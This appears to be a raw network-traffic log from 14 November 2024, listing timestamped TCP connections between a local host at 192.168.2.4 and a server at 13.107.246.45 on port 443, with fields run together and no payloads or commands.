                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.484832048 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.484893084 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.485054970 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.485061884 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.598879099 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.599396944 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.599431038 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.599890947 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.599905014 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.732441902 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.732479095 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.732538939 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.732552052 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.732625961 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.732939959 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.732989073 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.733017921 CET49788443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.733033895 CET4434978813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.736203909 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.736269951 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.736325979 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.736572981 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.736588001 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.929974079 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.930470943 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.930495977 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.931093931 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:52.931101084 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.060600996 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.060676098 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.060729027 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.060987949 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.061001062 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.061013937 CET49791443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.061018944 CET4434979113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.064155102 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.064197063 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.064264059 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.064512968 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.064522982 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.189095974 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.189682007 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.189728022 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.190099955 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.190108061 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.223913908 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.224759102 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.224759102 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.224772930 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.224783897 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.319999933 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.320029974 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.320084095 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.320115089 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.320357084 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.320357084 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.320400000 CET49792443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.320415020 CET4434979213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.326270103 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.326369047 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.326675892 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.326675892 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.326762915 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.330454111 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.331144094 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.331167936 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.331547022 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.331552029 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.356303930 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.356355906 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.356585979 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.356585979 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.356585979 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.359210968 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.359236956 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.359323978 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.359555006 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.359565020 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.461061954 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.461225033 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.461412907 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.461412907 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.462095976 CET49787443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.462109089 CET4434978713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.464288950 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.464376926 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.464526892 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.464689970 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.464725018 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.669665098 CET49793443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.669693947 CET4434979313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.815116882 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.816103935 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.816201925 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.816507101 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.816524029 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945208073 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945249081 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945308924 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945363998 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945708036 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945708036 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945708036 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.945797920 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.948798895 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.948837996 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.949256897 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.949256897 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:53.949284077 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.065644979 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.066168070 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.066191912 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.066761017 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.066767931 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.112303019 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.112710953 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.112736940 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.113658905 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.113663912 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.180478096 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.181042910 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.181056023 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.181468964 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.181473017 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.193460941 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194143057 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194164991 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194345951 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194354057 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194493055 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194633961 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194756985 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.194756985 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.195357084 CET49796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.195379019 CET4434979613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.197073936 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.197139978 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.197226048 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.197446108 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.197479963 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.242465973 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.242511988 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.242696047 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.242696047 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.242760897 CET49797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.242774963 CET4434979713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.245368004 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.245402098 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.246046066 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.246212959 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.246233940 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.247720003 CET49794443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.247786045 CET4434979413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.311153889 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.311362028 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.311463118 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.311463118 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.311507940 CET49795443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.311522961 CET4434979513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.314413071 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.314465046 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.314543009 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.314729929 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.314750910 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.322645903 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.322725058 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.322794914 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.322972059 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.322972059 CET49798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.323010921 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.323035002 CET4434979813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.326344013 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.326389074 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.326463938 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.326702118 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.326721907 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.716218948 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.717895031 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.717912912 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.718405008 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.718411922 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.847546101 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.847681999 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.847743034 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.847979069 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.847999096 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.848010063 CET49799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.848015070 CET4434979913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.851053953 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.851097107 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.851166010 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.851380110 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.851394892 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.935426950 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.935885906 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.935918093 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.936355114 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.936367989 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.983427048 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.984457970 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.984457970 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.984503031 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:54.984519958 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.050415993 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.050838947 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.050870895 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.051260948 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.051273108 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.067461967 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.067811966 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.067895889 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.067898035 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.067930937 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.067994118 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.068104029 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.068141937 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.068164110 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.068164110 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.068171978 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.068180084 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.070540905 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.070574045 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.070693970 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.070827961 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.070839882 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.119411945 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.119472980 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.119571924 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.119724035 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.119724035 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.119741917 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.119750023 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.121512890 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.121555090 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.121726990 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.121860027 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.121876955 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180155993 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180231094 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180349112 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180433989 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180521011 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180557966 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180600882 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.180617094 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.183157921 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.183202982 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.183269978 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.183417082 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.183429956 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.198209047 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.198369026 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.198474884 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.198474884 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.198474884 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.202125072 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.202166080 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.202327967 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.202392101 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.202400923 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.497795105 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.497821093 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.585159063 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.585695028 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.585724115 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.586324930 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.586332083 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.714883089 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.715045929 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.715106964 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.715169907 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.715192080 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.715203047 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.715208054 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:55.717606068 CET49809443192.168.2.413.107.246.45
